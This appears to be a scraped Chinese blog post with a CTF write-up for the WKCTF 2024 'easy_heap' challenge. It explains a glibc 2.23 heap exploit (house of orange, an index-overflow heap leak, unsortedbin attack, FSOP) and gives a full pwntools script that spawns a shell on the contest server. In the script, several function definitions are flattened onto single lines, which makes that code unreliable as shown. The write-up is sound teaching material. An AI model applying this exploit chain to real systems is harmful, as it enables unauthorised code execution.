当前位置: 首页 > news >正文

WKCTF 2024 easy_heap

很经典的house of orange + unsortedbin attack +FSOP+ 变量覆盖

不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。

 

但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢?

 

我们注意到这是>,但下标一般是从0开始,所以可能会有变量覆盖,我们看看。

 

果然,第33个chunk的size会覆盖第0个chunk地址的最后一字节,所以我们只需要调试一下,就可以通过show(0)泄露堆地址,其他没什么难度,以下是wp:

from pwn import *
context.arch='amd64'
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
#libc=elf.libc
io=remote('110.40.35.73',33774)def debug():gdb.attach(io)pause()def inter():io.interactive()def add(size,content):io.recvuntil(b">\n")io.sendline(b'1')io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def edit(idx,size,content):io.recvuntil(b">\n")io.sendline(b'2')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def show(idx):io.recvuntil(b">\n")io.sendline(b'3')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())def delete():io.recvuntil(b"please input:\n")io.sendline(b'2')add(0x30,b'aa')#0
#debug()
edit(0,0x40,b'a'*0x38+p64(0xfc1))
add(0x1000,b'aa')#1
#debug()
add(0x10,b'\x78')#2
show(2)
libc_base=u64(io.recv(8))-0x3c4178
print('libc_base:',hex(libc_base))
#debug()
for i in range(29):add(0x1000,b'aa')
add(0x80,b'\x60')#32
#debug()
show(0)
heap=u64(io.recv(8))-0x60
chunk=heap+0xf0
print('heap:',hex(heap))
system=libc_base+libc.sym['system']
pl=b'a'*(0x10+0x90)
#debug()
vtable=chunk+0xe0
print('vtable:',hex(vtable))
iolist=libc_base+libc.sym['_IO_list_all']
payload=b'/bin/sh\x00'+p64(0x61)+p64(0)+p64(iolist-0x10)
payload+=p64(0)+p64(1)
payload=payload.ljust(0xd8,b'\x00')
payload+=p64(vtable)
payload+=p64(0)*3+p64(system)
print(len(payload))
edit(2,0x300,pl+payload)
#debug()
io.recvuntil(b">\n")
io.sendline(b'0'*0x400+b'1')
io.interactive()

 

http://www.lryc.cn/news/399941.html

相关文章:

  • SQL 多变关联使用子查询去重
  • php表单提交并自动发送邮件给某个邮箱(示例源码下载)
  • 论文翻译:Large Language Models for Education: A Survey
  • 7.13实训日志
  • 【力扣】每日一题—第70题,爬楼梯
  • Docker修改国内镜像源
  • 安防监控视频平台LntonCVS视频融合共享平台智慧消防实现远程集中视频监控方案
  • 【大模型LLM面试合集】大语言模型架构_layer_normalization
  • OpenGL笔记八之EBO和EBO绘制流程
  • maven——(重要)手动创建,构建项目
  • 数学建模·非线性规划
  • SpringCloud第三篇(服务中心与OpenFeign)
  • Linux重要知识点
  • Unity宏和编辑器
  • 计算机网络——网络层(概念及IP地址划分)
  • 【JVM实战篇】内存调优:内存泄露危害+内存监控工具介绍+内存泄露原因介绍
  • CVE漏洞爬虫脚本
  • 如何搭建互联网医院系统源码?医疗陪诊APP开发实战详解
  • 高通平台android的Framework开发遇到的一些问题总结
  • 基于modbus tcp通讯的雷赛导轨控制器调试软件
  • 阿里云产品流转
  • GO语言中的接口(interface)
  • 模拟电路再理解系列(2)-电源滤波电路
  • uniapp使用多列布局显示图片,一行两列
  • 近期几首小诗汇总-生活~卷
  • 超时导致SparkContext构造失败的问题探究
  • 【人工智能】Transformers之Pipeline(一):音频分类(audio-classification)
  • Nginx 负载均衡详解
  • Unity3D开发之传送带实现
  • 【学习笔记】无人机(UAV)在3GPP系统中的增强支持(二)-支持高分辨率视频直播应用